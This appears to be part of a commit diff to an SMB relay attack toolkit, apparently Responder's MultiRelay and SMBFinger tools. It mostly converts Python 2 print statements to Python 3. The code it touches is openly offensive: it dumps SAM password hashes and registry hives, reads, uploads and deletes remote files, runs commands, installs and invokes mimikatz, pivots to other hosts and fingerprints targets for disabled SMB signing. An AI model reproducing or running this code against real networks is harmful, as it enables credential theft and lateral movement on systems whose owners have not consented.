print ("[+] The SAM file was saved in: ./relay-dumps/Sam-"+Host+".tmp and the hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt")
return data
except:
#Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works.
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
##########Save An HKLM Key And Its Subkeys#############
@ -1771,12 +1771,12 @@ def SaveAKey(data, s, Host, Key):
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable":
print "The Windows Remote Registry Service is sleeping, waking it up..."
print ("The Windows Remote Registry Service is sleeping, waking it up...")
time.sleep(3)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable":
print "Retrying..."
print ("Retrying...")
time.sleep(5)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
@ -1791,14 +1791,14 @@ def SaveAKey(data, s, Host, Key):
##Error handling.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n"
print ("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
data,s,handler,f = OpenHKLM(data,s,f)
data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+Key+".tmp", Key, handler, f, data, s)
if data[8:10] != "\x25\x00":
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
data,s = CloseFID(f, data, s)
data,s,f = SMBOpenFile("\\Windows\\Temp\\"+Key+".tmp", "C", Host, RW, data, s)
@ -1814,12 +1814,12 @@ def SaveAKey(data, s, Host, Key):
#After everything has been cleaned up, we write the output to a file.
WriteOutputToFile(Output, Host+"-"+Key+".tmp")
print "[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp"
print ("[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp")
return data
except:
#Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works.
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
##########ReadAFile#############
@ -1828,11 +1828,11 @@ def ReadFile(data, s, File, Host):
File = File.replace("/","\\")
data,s,f = SMBOpenFile(File, "C", Host, READ, data, s)
data,s,Output = GrabAndRead(f, File, data, s)
print Output
print (Output)
return ModifySMBRetCode(data) ##Command was successful, ret true.
except:
print "[+] Read failed. Remote filename was typed correctly?"
print ("[+] Read failed. Remote filename was typed correctly?")
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
def GetAfFile(data, s, File, Host):
@ -1841,11 +1841,11 @@ def GetAfFile(data, s, File, Host):
data,s,f = SMBOpenFile(File, "C", Host, READ, data, s)
data,s,Output = GrabAndRead(f, File, data, s)
WriteOutputToFile(Output, Host+"-"+File)
print "[+] Done."
print ("[+] Done.")
return ModifySMBRetCode(data) ##Command was successful, ret true.
except:
print "[+] Get file failed. Remote filename was typed correctly?"
print ("[+] Get file failed. Remote filename was typed correctly?")
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
##########UploadAFile#############
@ -1857,7 +1857,7 @@ def WriteFile(data, s, File, FileSize, FileContent, Host):
return ModifySMBRetCode(data) ##Command was successful, ret true.
except:
print "[+] Write failed."
print ("[+] Write failed.")
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
##########DeleteAFile############
@ -1868,7 +1868,7 @@ def DeleteFile(data, s, File, Host):
data,s = CloseTID(data, s)
return ModifySMBRetCode(data) ##Command was successful, ret true.
except:
print "[+] Delete operation failed.\n[+] Something went wrong."
print ("[+] Delete operation failed.\n[+] Something went wrong.")
data,s = CloseTID(data, s)
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
@ -1890,7 +1890,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, Fi
time.sleep(1)
data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s)
data,s,Output = ReadAndDelete(f, LogFile, data, s)
print Output
print (Output)
data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
Logs.info('Command executed:')
@ -1900,7 +1900,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, Fi
except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
##########Runas#############
@ -1922,7 +1922,7 @@ def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName)
time.sleep(1)
data,s,f = SMBOpenFile( LogFile, "C", Host, RW, data, s)
data,s,Output = ReadAndDelete(f, LogFile, data, s)
print Output
print (Output)
data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
Logs.info('Command executed:')
@ -1932,7 +1932,7 @@ def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName)
except:
data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
##########MimiKatz RPC#############
@ -1961,7 +1961,7 @@ def InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, Fi
except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName):
@ -1990,7 +1990,7 @@ def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileNam
return ModifySMBRetCode(data)
except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32."
print ("[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32.")
return ModifySMBRetCode(data)
##########Pivot#############
@ -2017,7 +2017,7 @@ def PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Host, RunAsPath,
except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
##########VerifyPivot#############
@ -2049,7 +2049,7 @@ def VerifyPivot(data, s, clientIP, Username, Domain, Pivot, Logs, Host, RunAsPat
except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
##########DoSomethingDumb#############

12
tools/MultiRelay/RelayMultiPackets.py
View file

@ -388,20 +388,20 @@ class SMBSessionSetupAndxAUTH(Packet):
SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
NTLMData = str(self.fields["Data"])
###### ASN Stuff
###### ASN Stuff
if len(NTLMData) > 255:
self.fields["ApplicationHeaderTagLenOfLen"] = "\x82"
self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0)
self.fields["ApplicationHeaderTagLenOfLen"] = "\x82"
self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0)
else:
self.fields["ApplicationHeaderTagLenOfLen"] = "\x81"
self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3)
self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3)
if len(NTLMData)-8 > 255:
self.fields["AsnSecMechLenOfLen"] = "\x82"
self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4)
self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4)
else:
self.fields["AsnSecMechLenOfLen"] = "\x81"
self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6)
self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6)
if len(NTLMData)-12 > 255:
self.fields["ChoosedTagLenOfLen"] = "\x82"

52
tools/SMBFinger/Finger.py
View file

@ -126,7 +126,7 @@ class SMBNegoDataLanMan(Packet):
#####################
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def IsSigningEnabled(data):
if data[39] == "\x0f":
@ -141,27 +141,27 @@ def dtoa(d):
return inet_ntoa(struct.pack("!L", d))
def OsNameClientVersion(data):
try:
length = struct.unpack('<H',data[43:45])[0]
try:
length = struct.unpack('<H',data[43:45])[0]
if length > 255:
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
if length <= 255:
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def GetHostnameAndDomainName(data):
try:
DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
try:
DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
#If max length domain name, there won't be a \x00\x00\x00 delineator to split on
if Hostname == '':
DomainJoined = data[81:110].replace('\x00','')
Hostname = data[113:].replace('\x00','')
return Hostname, DomainJoined
except:
return "Could not get Hostname.", "Could not get Domain joined"
if Hostname == '':
DomainJoined = data[81:110].replace('\x00','')
Hostname = data[113:].replace('\x00','')
return Hostname, DomainJoined
except:
return "Could not get Hostname.", "Could not get Domain joined"
def DomainGrab(Host):
s = socket(AF_INET, SOCK_STREAM)
@ -169,7 +169,7 @@ def DomainGrab(Host):
s.settimeout(Timeout)
s.connect(Host)
except:
print "Host down or port close, skipping"
print ("Host down or port close, skipping")
pass
try:
h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
@ -191,7 +191,7 @@ def SmbFinger(Host):
s.settimeout(Timeout)
s.connect(Host)
except:
print "Host down or port close, skipping"
print ("Host down or port close, skipping")
pass
try:
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
@ -252,10 +252,10 @@ def ShowResults(Host):
Signing, OsVer, LanManClient = SmbFinger(Host)
enabled = color("SMB signing is mandatory. Choose another target", 1, 1)
disabled = color("SMB signing: False", 2, 1)
print color("Retrieving information for %s..."%Host[0], 8, 1)
print enabled if Signing else disabled
print color("Os version: '%s'"%(OsVer), 8, 3)
print color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3)
print (color("Retrieving information for %s..."%Host[0], 8, 1))
print (enabled if Signing else disabled)
print (color("Os version: '%s'"%(OsVer), 8, 3))
print (color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3))
except:
pass
@ -288,7 +288,7 @@ def ShowScanSmallResults(Host):
Hostname, DomainJoined = DomainGrab(Host)
Signing, OsVer, LanManClient = SmbFinger(Host)
Message ="['%s', Os:'%s', Domain:'%s', Signing:'%s']"%(Host[0], OsVer, DomainJoined, Signing)
print Message
print (Message)
except:
pass
@ -299,13 +299,13 @@ def ShowSigning(Host):
s.settimeout(Timeout)
s.connect((Host, 445))
except:
print "[Pivot Verification Failed]: Target host is down"
print ("[Pivot Verification Failed]: Target host is down" )
return True
try:
Signing = SmbFingerSigning(Host)
if Signing == True:
print "[Pivot Verification Failed]:Signing is enabled. Choose another host."
print ("[Pivot Verification Failed]:Signing is enabled. Choose another host.")
return True
else:
return False